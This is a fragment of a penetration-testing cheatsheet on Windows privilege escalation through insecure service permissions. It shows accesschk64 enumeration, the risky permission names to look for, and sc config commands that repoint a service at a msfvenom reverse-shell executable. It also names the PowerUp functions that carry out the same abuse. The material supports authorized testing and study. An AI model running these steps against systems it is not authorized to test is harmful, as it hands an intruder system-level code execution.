0xa1d/0xa1d.github.io/cheatsheet.md

 - Insecure service permissions

 Check with `accesschk64.exe -uwcqv *` if you are member of any group.
 You can restrict output by supplying group parameter, like `accesschk64.exe -uwcqv "Everyone" *`.
 Look for `SERVICE_CHANGE_CONFIG`, `SERVICE_ALL_ACCESS`, `GENERIC_WRITE`, `GENERIC_ALL`, `WRITE_DAC` or `WRITE_OWNER` permissions.
 If so, you can reconfigure service and supply reverse shell executable made with msfvenom as parameter :
 ```
 sc config $SERVICE binPath= "c:\path\rev.exe"
 net stop $SERVICE
 net start $SERVICE
 ```

+With [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1), check with `Get-ServiceFilePermission` and abuse with `Install-ServiceBinary`.

 - Startup applications